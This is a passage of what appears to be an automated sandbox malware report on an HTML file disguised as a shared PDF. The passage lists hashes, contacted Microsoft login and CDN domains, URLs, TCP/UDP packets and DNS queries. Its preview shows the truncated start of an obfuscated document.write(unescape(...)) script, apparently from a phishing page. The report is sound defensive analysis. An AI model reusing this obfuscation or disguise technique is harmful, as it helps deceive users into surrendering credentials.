SHA1: 383843D92894994437E2DC3C649362789ABECD40
SHA-256: C3B3D7EB81E964FE30501939991C97C3BE6D8A40A868184B9DC773CD696A7809
SHA-512: 6C6E2294C5FB35700837D5314D6BB7FAF6762B7469533688B4DA7E71CB49F0264C6D5D225A0C468D28E87A61CCD267A25730BD29C6B496A899DB377C1CC8CA9B
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DFE2722E89930C0447.TMPProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Size (bytes): 25441
Copyright Joe Security LLC 2019 Page 35 of 47
Entropy (8bit): 0.41825796848948976
Encrypted: false
MD5: 2CE578A5C18E3868F4B05FFD3AC32B45
SHA1: 87D3562F718DA2D2D9E6A663D4D5315F79C7FFB1
SHA-256: 184A717F67A8AB38A2C2F5F2177280A40F92B8FFE1F5F78F190DCD2976EE25E4
SHA-512: FB0CAFB4560422FAEED61552C3F4FDD235CCCE371C149F30B42DF834205F273F4B039D0273E74A76D1A0CEE5B944322F9B5CAF86F6091B53AC85253F922B9A1D
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DFE2722E89930C0447.TMP
Name IP Active Malicious Antivirus Detection Reputation
aa-hip-prod.southcentralus.cloudapp.azure.com 104.215.74.84 true false high
cs1227.wpc.alphacdn.net 192.229.221.185 true false high
statics-uhf-wus.akamaized.net unknown unknown false high
signup.live.com unknown unknown false high
secure.aadcdn.microsoftonline-p.com unknown unknown false high
code.jquery.com unknown unknown false high
login.microsoftonline.com unknown unknown false high
aadcdn.msauth.net unknown unknown false high
assets.onestore.ms unknown unknown false high
img-prod-cms-rt-microsoft-com.akamaized.net unknown unknown false high
acctcdn.msauth.net unknown unknown false high
ajax.aspnetcdn.com unknown unknown false high
Name Source Malicious Antivirus Detection Reputation
https://aka.ms/redeemrewards servicesagreement[1].htm.2.dr false high
https://login.skype.com/login privacystatement[1].htm.2.dr false high
https://www.skype.com/go/ustax servicesagreement[1].htm.2.dr false high
https://www.visiblemeasures.com/viewer-settings-opt-out privacystatement[1].htm.2.dr false high
jquery.org/license jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr
false high
https://acctcdn.msauth.net signup[1].htm.2.dr false high
sizzlejs.com/ jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr
false high
https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico~(
imagestore.dat.2.dr false high
https://www.adr.org servicesagreement[1].htm.2.dr false high
https://login.microsof/Desktop/CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html
{6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr
false Avira URL Cloud: safe unknown
www.amazon.com/ msapplication.xml.1.dr false high
www.asp.net/ajaxlibrary/CDN.ashx. privacystatement[1].htm.2.dr false high
https://signup.live.com/error.aspx?errcode=1045&mkt=en-US
signup[1].htm.2.dr false high
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2
reprocess[1].htm.2.dr false high
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.core.min_2y6puv-fhesw6oymb-
reprocess[1].htm.2.dr false Avira URL Cloud: safe unknown
aka.ms/kr4ndl privacystatement[1].htm.2.dr false high
https://www.xbox.com/en-US/Legal/CodeOfConduct servicesagreement[1].htm.2.dr false high
opensource.org/licenses/mit-license.php) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr
false high
www.twitter.com/ msapplication.xml5.1.dr false high
www.json.org/json2.js knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr
false high
Domains and IPs
Contacted Domains
URLs from Memory and Binaries
Copyright Joe Security LLC 2019 Page 36 of 47
https://acctcdn.msauth.net/convergedsignuptemplatespackage_Z7Bw5rYduRaj_L3dZZgy6A2.js?v=1
signup[1].htm.2.dr false high
https://aadcdn.msauth.net/ests/2.1/ reprocess[1].htm.2.dr false high
www.xbox.com/ privacystatement[1].htm.2.dr false high
https://aka.ms/taxservice servicesagreement[1].htm.2.dr false high
https://watchbeam.zendesk.com/hc/en-us/articles/115000922623-Rules-of-User-Conduct
privacystatement[1].htm.2.dr false high
https://www.privacyshield.gov/welcome privacystatement[1].htm.2.dr false high
https://acctcdn.msauth.net/images/convergedbg_small_v2_Z9GCPpM7FVE8hxRSZUez6g2.jpg)
signup[1].htm.2.dr false high
https://ondemand.webtrends.com/support/optout.asp privacystatement[1].htm.2.dr false high
https://skype.com/go/myaccount servicesagreement[1].htm.2.dr false high
https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico~
imagestore.dat.2.dr false high
https://www.skype.com servicesagreement[1].htm.2.dr false high
https://www.appsflyer.com/optout privacystatement[1].htm.2.dr false high
https://www.privacyshield.gov/ privacystatement[1].htm.2.dr false high
https://privacy.micros {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr
false high
getbootstrap.com) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr
false high
https://acctcdn.msauth.net/lwsignupheaderjs_4NYTMbxtFAmu44aIr74B-Q2.js?v=1
signup[1].htm.2.dr false high
https://acctcdn.msauth.net/lightweightsignuppackage_wZ8EUx6qAhhR2oShS4Wetg2.js?v=1
signup[1].htm.2.dr false high
https://aim.yahoo.com/aim/us/en/optout/ privacystatement[1].htm.2.dr false high
www.mpegla.com servicesagreement[1].htm.2.dr false high
github.com/requirejs/almond/LICENSE 18-d72213[1].js.2.dr false high
www.clicktale.net/disable.html privacystatement[1].htm.2.dr false high
www.reddit.com/ msapplication.xml4.1.dr false high
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_xqvbwocyraoe
reprocess[1].htm.2.dr false Avira URL Cloud: safe unknown
https://mixer.com/contact servicesagreement[1].htm.2.dr false high
https://www.here.com/) privacystatement[1].htm.2.dr false high
https://www.skype.com/go/store.reactivate.credit servicesagreement[1].htm.2.dr false high
https://www.adjust.com/opt-out/ privacystatement[1].htm.2.dr false high
www.nytimes.com/ msapplication.xml3.1.dr false high
https://acctcdn.msauth.net/images/convergedbg_v2_pdvUOT_2pyXH5ith335y8A2.jpg)
signup[1].htm.2.dr false high
https://kissmetrics.com/user-privacy privacystatement[1].htm.2.dr false high
https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
signup[1].htm.2.dr false high
https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
imagestore.dat.2.dr false high
https://acctcdn.msauth.net/images/favicon.ico?v=2~ imagestore.dat.2.dr false high
fontello.com icons[1].eot.2.dr false high
https://signup.live.co {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr
false high
https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1
signup[1].htm.2.dr false high
knockoutjs.com/ ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr, knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr
false high
https://ec.europa.eu/info/law/law-topic/data-protection/data-transfers-outside-eu/adequacy-protectio
privacystatement[1].htm.2.dr false high
https://github.com/douglascrockford/JSON-js signup[1].htm.2.dr, ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr
false high
https://acctcdn.msauth.net/images/favicon.ico?v=2~( imagestore.dat.2.dr false high
www.nielsen-online.com/corp.jsp?section=leg_prs&nav=1#Optoutchoices
privacystatement[1].htm.2.dr false high
Name Source Malicious Antivirus Detection Reputation
Copyright Joe Security LLC 2019 Page 37 of 47
https://acctcdn.msauth.net/knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2.js?v=1
signup[1].htm.2.dr false high
https://www.skype.com/go/allrates servicesagreement[1].htm.2.dr false high
https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pfPjf9tCnoZxLPMa20Xx0A2.js?v=1
signup[1].htm.2.dr false high
www.opensource.org/licenses/mit-license.php) ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr, knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr
false high
fontello.comiconsRegulariconsiconsVersion icons[1].eot.2.dr false high
www.criteo.com/ privacystatement[1].htm.2.dr false high
www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html
privacystatement[1].htm.2.dr false high
https://login.microsof {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr
false high
www.youtube.com/ msapplication.xml7.1.dr false high
https://www.skype.com/go/legal servicesagreement[1].htm.2.dr false high
www.networkadvertising.org/ privacystatement[1].htm.2.dr false high
https://mixer.com/about/tos servicesagreement[1].htm.2.dr false high
https://www.microsoft. {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr
false high
https://github.com/twbs/bootstrap/blob/master/LICENSE) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr
false high
www.wikipedia.com/ msapplication.xml6.1.dr false high
https://acctcdn.msauth.net/images/favicon.ico?v=2 imagestore.dat.2.dr false high
https://www.skype.com/legal/broadcast servicesagreement[1].htm.2.dr false high
www.a9.com/ privacystatement[1].htm.2.dr false high
www.live.com/ msapplication.xml2.1.dr false high
https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css
app[1].css.2.dr false high
https://www.linkedin.com/legal/privacy-policy privacystatement[1].htm.2.dr false high
https://login.microsoftonline.com/common/reprocess?ctx=rqiiaxwro2_tuacfc_mwlscowgdswary4nfiia4hcz2e2
~DF2952A600E710646A.TMP.1.dr false high
www.appnexus.com/ privacystatement[1].htm.2.dr false high
https://acctcdn.msauth.net/converged_ux_v2_pfEhDrELLHNcznXIOy__sQ2.css?v=1
signup[1].htm.2.dr false high
jquery.com/ jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr
false high
https://www.xbox.com/Legal/ThirdPartyDataSharing privacystatement[1].htm.2.dr false high
Name Source Malicious Antivirus Detection Reputation
Contacted IPs
Copyright Joe Security LLC 2019 Page 38 of 47
Static File Info
GeneralFile type: HTML document, ASCII text, with very long lines, with
CRLF line terminators
Entropy (8bit): 3.117783318185634
TrID: Java Script embedded in Visual Basic Script (4500/0) 100.00%
File name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
File size: 566395
MD5: 0a3a65e4479f61e0d5618894d11c2e47
SHA1: 6e51ebe4fbcc3a4941fbb0e179f710470ac0da7f
SHA256: fb470475c8c24b97f8dbe7df23a312ad84de5feea065a99b1fd317bca80e4c7b
SHA512: 9fa49e82dddb99e261e15ef078e903a5db4c0d8d51f06dcd7ba59b594d365641e0cd957d8555ba6ff5fdc783616c5bc4837da0cc964685d6ce6015a33e26bd4b
SSDEEP: 768:5aAZeagr0A1SAvLEvS2S37WRQAElji3yX2AksAYmAVA3FSA3jfAkD+AkU/AkNEAu:m3jJwfZ0
File Content Preview: <script type="text/javascript">.. ..document.write(unescape('%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%6a%61%76%61%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%33%43%25%32%31%44%4f%43%54%5
File Icon
Icon Hash: f8c89c9a9a998cb8
No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs
IP Country Flag ASN ASN Name Malicious
192.229.221.185 United States 15133 unknown false
104.215.74.84 United States 8075 unknown false
Public
Copyright Joe Security LLC 2019 Page 39 of 47
Network Behavior
Timestamp Source Port Dest Port Source IP Dest IP
Jul 9, 2019 03:22:37.604620934 CEST 49725 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.604711056 CEST 49726 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.604902983 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.605007887 CEST 49728 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.605221987 CEST 49729 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.605460882 CEST 49730 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.621936083 CEST 443 49725 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.622029066 CEST 49725 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.622088909 CEST 443 49726 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.622112036 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.622132063 CEST 443 49728 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.622227907 CEST 49726 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.622272968 CEST 443 49729 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.622273922 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.622293949 CEST 49728 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.622451067 CEST 49729 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.622554064 CEST 443 49730 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.622725010 CEST 49730 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.623944998 CEST 49725 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.624990940 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.625138044 CEST 49729 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.625617981 CEST 49728 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.628238916 CEST 49730 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.628369093 CEST 49726 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.641062021 CEST 443 49725 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642126083 CEST 443 49725 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642177105 CEST 443 49725 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642220020 CEST 443 49725 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642251968 CEST 443 49725 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642271042 CEST 443 49725 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642288923 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642308950 CEST 443 49729 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642452955 CEST 49725 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.642946005 CEST 443 49728 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.642995119 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643050909 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643151999 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.643182993 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643217087 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643321991 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.643357992 CEST 443 49729 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643433094 CEST 443 49729 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643450975 CEST 49729 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.643498898 CEST 443 49729 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643553019 CEST 443 49729 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643606901 CEST 49729 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.643672943 CEST 443 49729 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643716097 CEST 443 49728 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643753052 CEST 443 49728 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643779039 CEST 49729 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.643798113 CEST 49728 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.643831968 CEST 443 49728 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643855095 CEST 443 49728 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.643874884 CEST 443 49728 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.644002914 CEST 49728 443 192.168.2.5 192.229.221.185
TCP Packets
Copyright Joe Security LLC 2019 Page 40 of 47
Jul 9, 2019 03:22:37.645184040 CEST 443 49730 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.645358086 CEST 443 49726 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646274090 CEST 443 49730 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646306992 CEST 443 49730 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646389961 CEST 443 49730 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646456957 CEST 443 49730 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646471024 CEST 49730 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.646497011 CEST 443 49730 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646528006 CEST 443 49726 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646563053 CEST 443 49726 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646593094 CEST 443 49726 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646611929 CEST 443 49726 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646630049 CEST 443 49726 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.646693945 CEST 49730 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.646713972 CEST 49726 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.660800934 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.663371086 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.664352894 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.664704084 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.665040016 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.666110992 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.666243076 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.666363001 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.666477919 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.666599989 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.675599098 CEST 49729 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.676090002 CEST 49729 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.677460909 CEST 49730 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.678528070 CEST 49730 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.679276943 CEST 49726 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.679908991 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.680039883 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.680138111 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.680264950 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.680337906 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.681052923 CEST 49725 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.681222916 CEST 49726 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.681548119 CEST 49727 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.681583881 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.681865931 CEST 49728 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.682305098 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.683160067 CEST 49725 443 192.168.2.5 192.229.221.185
Jul 9, 2019 03:22:37.683197021 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.683248043 CEST 443 49727 192.229.221.185 192.168.2.5
Jul 9, 2019 03:22:37.683276892 CEST 443 49727 192.229.221.185 192.168.2.5
Timestamp Source Port Dest Port Source IP Dest IP
Timestamp Source Port Dest Port Source IP Dest IP
Jul 9, 2019 03:22:15.306005955 CEST 60811 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:15.344815016 CEST 53 60811 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:18.036662102 CEST 57659 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:18.072875023 CEST 53 57659 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:18.101578951 CEST 54527 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:18.120796919 CEST 53 54527 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:33.459271908 CEST 60440 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:33.498903036 CEST 53 60440 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:34.615241051 CEST 62740 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:34.648251057 CEST 53 62740 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:34.807482958 CEST 62238 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:34.837987900 CEST 53 62238 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:36.174796104 CEST 65013 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:36.197906971 CEST 53 65013 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:36.586719036 CEST 55972 53 192.168.2.5 8.8.8.8
UDP Packets
Copyright Joe Security LLC 2019 Page 41 of 47
Jul 9, 2019 03:22:36.628884077 CEST 53 55972 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:37.413742065 CEST 51695 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:37.475236893 CEST 53 51695 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:37.620021105 CEST 60558 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:37.657002926 CEST 53 60558 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:39.055264950 CEST 63487 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:39.078263044 CEST 53 63487 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:39.146162987 CEST 54294 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:39.191160917 CEST 53 54294 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:40.320421934 CEST 65179 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:40.327626944 CEST 65315 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:40.335621119 CEST 49772 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:40.351214886 CEST 50135 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:40.362567902 CEST 53 65179 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:40.366381884 CEST 53 49772 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:40.372360945 CEST 53 65315 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:40.390448093 CEST 53 50135 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:43.518302917 CEST 65205 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:43.541495085 CEST 53 65205 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:44.350034952 CEST 64570 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:44.407598972 CEST 53 64570 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:44.782726049 CEST 62955 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:44.814117908 CEST 53 62955 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:45.325735092 CEST 59147 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:45.339833975 CEST 53 59147 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:45.847078085 CEST 61222 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:45.879093885 CEST 53 61222 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:46.334467888 CEST 59147 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:46.348403931 CEST 53 59147 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:46.857953072 CEST 61222 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:46.871692896 CEST 53 61222 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:47.344588041 CEST 59147 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:47.359529972 CEST 53 59147 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:47.860244989 CEST 61222 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:47.891139984 CEST 53 61222 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:49.359091997 CEST 59147 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:49.381702900 CEST 53 59147 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:49.857733965 CEST 61222 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:49.871602058 CEST 53 61222 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:53.363944054 CEST 59147 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:53.377852917 CEST 53 59147 8.8.8.8 192.168.2.5
Jul 9, 2019 03:22:53.869606018 CEST 61222 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:22:53.883584023 CEST 53 61222 8.8.8.8 192.168.2.5
Jul 9, 2019 03:23:04.888499975 CEST 56934 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:23:05.052109957 CEST 53 56934 8.8.8.8 192.168.2.5
Jul 9, 2019 03:23:05.881908894 CEST 56934 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:23:06.888025999 CEST 56934 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:23:06.933669090 CEST 53 56934 8.8.8.8 192.168.2.5
Jul 9, 2019 03:23:06.949147940 CEST 53 56934 8.8.8.8 192.168.2.5
Jul 9, 2019 03:23:08.899605989 CEST 56934 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:23:08.927752018 CEST 53 56934 8.8.8.8 192.168.2.5
Jul 9, 2019 03:23:12.906055927 CEST 56934 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:23:12.934633970 CEST 53 56934 8.8.8.8 192.168.2.5
Jul 9, 2019 03:24:16.948779106 CEST 55625 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:24:16.967993021 CEST 53 55625 8.8.8.8 192.168.2.5
Jul 9, 2019 03:24:17.961113930 CEST 55625 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:24:17.987577915 CEST 53 55625 8.8.8.8 192.168.2.5
Jul 9, 2019 03:24:18.964833975 CEST 55625 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:24:18.991202116 CEST 53 55625 8.8.8.8 192.168.2.5
Jul 9, 2019 03:24:20.979218006 CEST 55625 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:24:20.998610020 CEST 53 55625 8.8.8.8 192.168.2.5
Jul 9, 2019 03:24:24.992845058 CEST 55625 53 192.168.2.5 8.8.8.8
Jul 9, 2019 03:24:25.019279957 CEST 53 55625 8.8.8.8 192.168.2.5
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2019 Page 42 of 47
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Jul 9, 2019 03:22:18.036662102 CEST 192.168.2.5 8.8.8.8 0x647f Standard query (0)
secure.aadcdn.microsoftonline-p.com
A (IP address) IN (0x0001)
Jul 9, 2019 03:22:18.101578951 CEST 192.168.2.5 8.8.8.8 0xc682 Standard query (0)
code.jquery.com A (IP address) IN (0x0001)
Jul 9, 2019 03:22:33.459271908 CEST 192.168.2.5 8.8.8.8 0xf793 Standard query (0)
secure.aadcdn.microsoftonline-p.com
A (IP address) IN (0x0001)
Jul 9, 2019 03:22:34.615241051 CEST 192.168.2.5 8.8.8.8 0x96be Standard query (0)
login.microsoftonline.com
A (IP address) IN (0x0001)
Jul 9, 2019 03:22:34.807482958 CEST 192.168.2.5 8.8.8.8 0x4f22 Standard query (0)
aadcdn.msauth.net
A (IP address) IN (0x0001)
Jul 9, 2019 03:22:36.586719036 CEST 192.168.2.5 8.8.8.8 0x19d5 Standard query (0)
signup.live.com A (IP address) IN (0x0001)
Jul 9, 2019 03:22:37.413742065 CEST 192.168.2.5 8.8.8.8 0x9b8 Standard query (0)
acctcdn.msauth.net
A (IP address) IN (0x0001)
